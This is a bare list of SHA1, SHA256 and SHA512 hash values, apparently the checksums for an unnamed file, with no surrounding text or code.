SHA1f79d955a6eac2f0368c79f7ba8061e9c58ba99b2
SHA2563f6dd990e2da5d3bd6d65a72cbfb0fe79eb30b118a8ad71b6c9bb5581a622dce
SHA5122d22fe535f464f635d42e5b016741b9caf173da372e4563a565fa1e294581f44330c61e08edfe4c08a341ebd708e2ad08614161c0ee54e8dea99452b87d1e710